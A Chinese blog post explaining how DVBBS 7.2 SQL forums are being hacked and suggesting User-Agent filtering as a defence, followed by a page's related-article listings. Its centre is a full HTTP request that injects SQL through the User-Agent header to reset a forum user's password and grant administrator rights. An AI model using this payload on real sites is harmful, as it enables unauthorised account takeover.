DV72SQL的防被黑心得

最新推荐文章于 2023-08-23 21:08:20 发布
原创 最新推荐文章于 2023-08-23 21:08:20 发布 · 2.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #action #服务器 #工具 #user

朋友论坛频频被黑,虽服务器无上传组件且关闭FSO仍遭攻击,分析可能是DV72SQL版本问题,攻击借助桂林老兵写的利用工具。给出攻击数据包内容,提出加检测User - Agent过程,严格控制提交数据客户端环境参数的防黑建议。

近日,有朋友说自己的论坛频频被黑,服务器没有任何的上传组件,已经关闭了FSO.但照样被黑.

也就分析这有可能是DV72SQL版本自身的问题.

据N长时间的较量,朋友得到所谓的攻击方式,其实也无非是借助了桂林老兵写的一个DV72SQL的BUG的利用工具.

提交的数据包内容-----------------

GET /bbs/showerr.asp?BoardID=1&action=OtherErr HTTP/1.1
Referer: http://www.target.com/bbs/showerr.asp?BoardID=1&action=OtherErr
User-Agent: Mozilla/4.0 (compatible;M;M;M;','论坛首页',7,'',2) update Dv_User set UserPassword='4621d373cade4e83',UserGroupID=1 where username='桂林老兵'--Netscape
Host: www.target.com
Cookie:

这些就是即将要攻击的数据.

其实这种东西.只要我们加此检测User-Agent的过程就可以了.
至于如何去写这些代码,相信大家都心中有数了吧?

以后我们在程序的防黑上一定要做足一点.
最好再对提交数据的客户端的环境参数要进行严格的控制.

sql案例分析:统计连续登陆、日活、蚂蚁森林、排名等
.
07-28 3932
这样处理的结果是,相同的 group by key 有可能分发到不同的 reduce 中,从而达到负载均衡的目的;问题:假设2017年1月1日开始记录低碳数据(user_low_carbon),假设2017年10月1日之前满足申领条件的用户都申领了一颗p004-胡杨,剩余的能量全部用来领取“p002-沙柳”。问题:查询user_low_carbon表中每日流水记录,条件为:用户在2017年,连续三天(或以上)的天数里,每天减少碳排放(low_carbon)都超过100g的用户低碳流水。
DVWA之SQL注入漏洞
weixin_56306210的博客
01-30 2977
DVWA之SQL注入漏洞
JAVA代码优化,接口优化,SQL优化 (小技巧)
沉淀所学,分享所思,让热爱与成长同行。商务记录AI实战经验,助力开发者快速成长。 热爱AI,希望做出有影响力的技术成果。 技术点亮生活,分享连接价值与机会。 专注AI落地实战,陪你走好技术每一步。
08-04 6639
不知道你有没有拼接过字符串,特别是那种有多个参数,字符串比较长的情况。比如现在有个需求:要用get请求调用第三方接口,url后需要拼接多个参数。以前我们的请求地址是这样拼接的: 字符串使用号拼接,非常容易出错。后面优化了一下,改为使用拼接字符串: 代码优化之后,稍微直观点。但还是看起来比较别扭。这时可以使用方法优化: 代码的可读性,一下子提升了很多。我们平常可以使用方法拼接url请求参数,日志打印等字符串。想必大家都使用得比较多,我们经常需要把数据某个文件,或者从某个文件中数据到中,甚至还有可能把文件a,从
DVWA-SQL注入通关
yuan_boss的博客
08-23 1817
由于源码中使用了mysqli_real_escape_string()函数对我们输入的数据进行转义了,所以无法使用字符型注入了,然而源码中的语句恰好不是字符型注入,而是数字型注入,又因为页面回显,所以可以使用联合注入获取数据库名。users表的字段:user_id,first_name,last_name,user,password,avatar,last_login,failed_login。通过单引号,双引号依次尝试,发现单引号会引发报错,而双引号不会报错,所以是使用单引号的字符串类型。
读书笔记:SQL 查询中的SQL*Plus 替换变量(DEFINE变量)和参数
In-Memory Computing Technology
06-23 3384
此文主要是讲替换变量,也称为DEFINE变量,但也涉及了绑定变量和SQL Plus系统变量。 这篇文章展示了替换变量如何替换 Oracle SQLSQL*Plus 语句中的硬编码文本。 向作者致敬,尽管是10多年前的文章,但写的非常好和全面,仍具重要参考价值。...
【网络安全】DVWA之SQL注入—medium level解题详析
热门推荐
等风来
04-21 1万+
这行代码使用了PHP内置的 mysqli_real_escape_string() 函数对 $id 变量进行转义处理,以SQL 注入攻击。在 Web 应用程序中,当用户在浏览器中提交表单时,浏览器会对数据进行 URL 编码,然后再将编码后的数据发送到后端服务器上。group_concat函数 是 MySQL 中的一个聚集函数,用于将指定列(或表达式)的值以逗号分隔的形式进行拼接。由于字符串’dvwa’中所有的字符均不需要编码,所以URL编码绕过失效。等),剩下的其它所有字符必须通过%xx编码处理。
SQL Server 中无法修改表?
weixin_48779307的博客
01-22 3272
主要解决步骤: 工具→选项→设计器(designer)→表设计器和数据库设计器→取消勾选“阻止用户对表的修改” 图示: 点击上部菜单栏的“工具”选项,并选择弹框最底部的“选项”选项卡。 选择Designers(设计器)下的“表设计器和数据库设计器”,最后将“阻止用户对表的修改”取消勾选即可。 ...
SQL 注入漏洞检测与利用
LYSHARK
03-31 7050
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,它是利用现有应用程序将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句.
看了这篇文章,终于知道怎么区分DV、OV、EV证书了
liuzhen007的专栏
08-05 8484
目录 前言 正文 一、证书类型 二、证书区别 2.1 OV、DV和EV证书的区别 2.2如何区分OV和DV证书? 2.3如何区分EV和OV证书? 三、市场调研 3.1 证书类型的选择 3.2常见应用的证书类型​ 结尾 前言 网站搭建和客户端打包都会用到数字签名证书,市场上那么多签名证书应该用哪个呢?这个问题之前也困扰过我,自己前前后后调研过多次,每次调研,上次的内容都忘的差不多了,感觉这次有必要记录一下,一方面避免以后可能的重复工作,另一方面是希望对需要的人有所帮助。 ...
DV6.2 For SQL存储过程版
10-13
DV6.2 For SQL存储过程版:提升网站性能与数据处理能力》 在IT行业中,数据库管理系统(DBMS)的选择对于网站的性能至关重要。动网先锋的DV6.2 For SQL存储过程版是一个经过精心改良的系统,它将原本基于Access的...
精选资源
ST25DV04K_ST25DV16K_ST25DV64K中文资料.rar
10-16
1.ST25DV04KST25DV16KST25DV64K 中文数据手册 2.ST25DV02K-W1ST25DV02K-W2 中文数据摘要 3.使用ST25DVxxx支持的快速传输模式实现有线(I²C)和 无线(RF ISO 15693)之间的数据交换 4.使用ST25DVxxx和ST25TV64K...
精选资源
意法半导体 ST25DV04K使用说明
04-29
意法半导体(STMicroelectronics)的ST25DV04K是一款动态NFC/RFID标签IC,其具有不同容量版本(4-Kbit、16-Kbit或64-Kbit EEPROM)和快速传输模式功能。该器件能够实现I2C接口和RF接口间的快速数据交换,具有半双工...
ST25DV数据手册中文版
09-07
ST25DV数据手册中文版 04k 16k 64k通用
精选资源
基于最小二乘优化的加权DV-Hop改进算法
02-21
针对传统DV-Hop算法定位精度差的问题,加权DV-Hop算法优化了待计算节点的平均单跳距离。在存在GPS定位误差的情况下,对加权DV-Hop算法进行了改进,利用最小二乘法优化全网信标节点的平均单跳距离,利用二次曲线算法代替...
【vue】element 的el-table,数据刷新,但表格不刷新 终极解决方案
无轩居 (Home of vip)
03-06 8197
vue 2.x 的elment ui this.tableData.splice(1.0) 强制它更新一下就可以了。 要不要,你就算主动去getdata,它也不会更新
关于Tomcat: The value for the useBean class attribute is invalid 问题的另类解释
无轩居 (Home of vip)
05-31 7867
关于Tomcat: The value for the useBean class attribute is invalid 问题大家,或者说高高手通常给的就是如下的解释http://groups.google.com/group/programmercafe/browse_thread/thread/379cf84cd4615203/eeb1f45e2d79bc32但是我本人比较白痴
vue element ui el_upload 一直报跨域问题的解决办法。
无轩居 (Home of vip)
04-25 4607
这几天用 element ui 做后台上传文件的时候。 本来做得好好的。。。 结果 在设置多行传文件的时候,一直 跨域问题。 我就纳闷了,我后端我已经设置了可以跨域问题啊。 而且这个上传路径,还是同一个后端的不同目录罢了。 其他地址都好好的呀。 怎么会一直报跨域呢? 真的是百度了二天,一直没解决, 然后最后只好把好的那部分代码和坏的那部分代码一行一行对比 最后发现和前端代码无关。 因为我切换到正常...
在ASP中实现RsA加密与解密
无轩居 (Home of vip)
01-17 4480
本文章有两文件组成test.asp 测试演示文件clsrsa.asp 实现rsa加密与解密的vbs类文件下面是代码: 1. test.asprem 文章标题:在asp中通过vbs类实现rsa加密与解密rem 收集整理:yanekrem 联系:aspboy@263.net%>Dim LngKeyEDim LngKeyDDim LngKeyNDim StrMessageDim Ob
[收藏]JavaMail - 发送HTML邮件
无轩居 (Home of vip)
01-25 4255
JavaMail - 发送HTML邮件 form.htm ======== 邮件例程 - JavaMail - 发送HTML邮件 SMTP主机: 发信人: 收信人: 抄送人: 暗送人: 主题: 内容: send.jsp ======== 作者:何志强[hhzqq@21cn.com] 日期:2000-08-16 版本
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

3cts

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值